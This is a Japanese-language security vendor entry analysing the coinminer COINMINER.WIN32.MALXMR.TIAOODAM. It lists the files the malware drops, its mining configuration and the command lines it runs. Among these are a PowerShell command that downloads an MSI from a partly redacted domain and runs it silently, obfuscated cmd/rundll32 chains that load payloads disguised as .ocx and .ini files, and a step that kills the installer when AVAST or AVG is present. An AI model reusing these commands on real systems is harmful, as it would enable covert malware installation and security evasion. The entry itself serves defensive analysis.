COINMINER.WIN32.MALXMR.TIAOODAM

トレンドマイクロは、このマルウェアをNoteworthy（要注意）に分類しました。

マルウェアは、自身の活動に複数の難読化を取り入れ検出回避機能を発達させたコインマイナーです。

コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

侵入方法

コインマイナーは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

コインマイナーは、以下のファイルを作成します。

• %User Temp%\{8 Random Characters}.msi → Downloaded file
• %User Temp%\[{6 Random Characters}] → Coinminer configuration
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\data.bin
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\dafault.ocx
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ex.exe → normal file a unzipping tool
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\icon.ico → Detected as ADW_FileTour
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\FRERES32.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\SpyGlass.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\_setup.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\bin.dat
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\plugin.cx
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\f.bat → Detected as Trojan.BAT.TASKILL.AA
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ex.exe → normal file a unzipping tool
• %User Temp%\{6 Random Characters}.cmD

(註：%User Temp%フォルダは、現在ログオンしているユーザの一時フォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\＜ユーザー名＞\Local Settings\Temp"です。また、Windows Vista、7、8の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Local\Temp" です。. %Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)

コインマイナーは、以下のフォルダを作成します。

• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6 Digit System Time}\ → Create in first run
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6 Digit System Time}\ → Create when the coinminer process has been terminated

(註：%Application Data%フォルダは、現在ログオンしているユーザのアプリケーションデータフォルダです。Windows 2000、XP、Server 2003の場合、通常 "C:\Documents and Settings\＜ユーザ名＞\Local Settings\Application Data" です。また、Windows Vista、7、8の場合、通常 "C:\Users\＜ユーザ名＞\AppData\Roaming" です。)

ダウンロード活動

コインマイナーは、以下のWebサイトにアクセスし、不正なファイルをダウンロードして実行します。

• https://{BLOCKED}in1709.info/update.txt

＜補足＞
インストール

コインマイナーは、以下のファイルを作成します。

• %User Temp%\{ランダムな8文字}.msi →ダウンロードされたファイル
• %User Temp%\[{ランダムな6文字}] →コインマイナーの設定ファイル
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\data.bin
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\dafault.ocx
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ex.exe →通常のファイル解凍ツール
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\icon.ico → Detected as ADW_FileTour
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\FRERES32.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\SpyGlass.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\_setup.ini
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\bin.dat
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\plugin.cx
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\f.bat →Trojan.BAT.TASKILL.AAとして検出されるファイル
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ex.exe → 通常のファイル解凍ツール
• %User Temp%\{ランダムな6文字}.cmD

コインマイナーは、以下のフォルダを作成します。

• %Application Data%\Microsoft\Windows\Templates\FileZilla Server\{6桁のシステム時刻}\ →初回実行時に作成される
• %Application Data%\Microsoft\Windows\Templates\Response Center\{6桁のシステム時刻}\ →コインマイナーのプロセスが終了した時に作成される

その他

コインマイナーは以下を実行します。

• 自身のマイニング活動に以下の詳細が使用される
  • アルゴリズム: cryptonight
  • ユーザ名: {BLOCKED}1xWHG1vywX2xTV8XZzbzB1E2QHEF9GtzPhSPRdK5TEkxXGRxVdAq8LwbA2Pz7jNQ9gYBxeFPHcqiiqaGJM2QyW64C
  • パスワード: soft-net
  • URL: {BLOCKED}.{BLOCKED}.{BLOCKED}4.170:2223
• 初回実行時に以下のプロセスを作成する
  • f.batの実行（システムにAVAST あるいはAVGがインストールされていた場合は、コインマイナーのインストーラプロセスを強制終了する）
    • cmd /c ""%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\{6桁のシステム時刻}\f.bat" "
  • icon.icoを解凍 (パスワード: icon)
    • cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\"&ex -o -P icon icon.ico"
  • サブフォルダを作成し、全ての作成したファイルを移動してから、rundll32.exeを使用してdefault.ocxから関数Entryを読み込む
    • "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\*.*" "%Application Data%\Microsoft\Windows\Templates\\FileZilla Server\!poq!"\&!iao! default.ocx,Entry u"
  • msiexecを強制終了する
    • "%System%\taskkill.exe" /IM msiexec.exe /F

    コインマイナーのプロセスを終了した後、以下のプロセスを作成する

  • msiインストーラを％User Temp％にダウンロード
    • "%System%\WindowsPowerShell\v1.0\powershell.exe" -command "$cli = new-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'Windows Installer';$f = ' %User Temp%\\{ランダムな8文字}.msi'; $cli.DownloadFile('https://{BLOCKED}in1709.info/update.txt', $f);Start-Process $f -ArgumentList '/q'"
  • ダウンロードしたファイルを実行
    • "%System%\msiexec.exe" /i "%User Temp%\{ランダムな8文字}.msi" /q
  • f.batを実行（システムにAVASTまたはAVGがインストールされていた場合、コインマイナーのインストーラプロセスを強制終了）
    • cmd /c ""%Application Data%\Microsoft\Windows\Templates\\Response Center\{6桁のシステム時刻}\f.bat" "
  • plugin.cxを解凍 (パスワード: ZvDggW):
    • "cmd" /c "cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\"&ex -o -P ZvDggW plugin.cx"
  • サブフォルダを作成し、作成したファイル全てを移動してから、rundll32.exeを使用して_setup.iniから関数Entryを読み込む
    • "cmd" /v:on /c "set iao=rundll32&set poq=%time:~6,2%%time:~0,2%%time:~3,2%&mKdir "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"&cd "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!\"&move /y "%Application Data%\Microsoft\Windows\Templates\\Response Center\*.*" "%Application Data%\Microsoft\Windows\Templates\\Response Center\!poq!"\&!iao! _setup.ini,Entry u"
  • 作成したフォルダ内のすべてのファイルを削除します。
    • cmd /c ""%User Temp%\{ランダムな6文字}.cmD" "

注意

6桁のシステム時刻の例）071756
07はミリ秒、17は時間、56は分を示す

FRERES32.iniはTotal CommanderからWindows 9x / ME上で無料のシステムリソースを利用するためのライブラリです。
SpyGlass.iniはInqSoft Window Scannerによるソフトウェアのライブラリです。